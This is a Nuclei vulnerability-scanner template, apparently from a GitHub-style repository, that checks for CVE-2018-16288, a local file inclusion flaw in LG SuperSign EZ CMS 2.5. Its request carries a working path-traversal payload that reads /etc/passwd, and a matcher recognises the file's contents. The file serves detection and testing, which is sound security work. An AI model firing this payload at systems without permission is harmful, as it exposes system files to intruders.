my-nuclei-templates/CVE-2018-16288.yaml

35 lines
965 B
YAML
Executable File

id: CVE-2018-16288
info:
name: LG SuperSign EZ CMS 2.5 - Local File Inclusion
author: daffainfo
severity: high
description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs.
reference:
- https://www.exploit-db.com/exploits/45440
- https://www.cvedetails.com/cve/CVE-2018-16288
- http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html
- https://www.exploit-db.com/exploits/45440/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2018-16288
cwe-id: CWE-200
tags: cve,cve2018,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200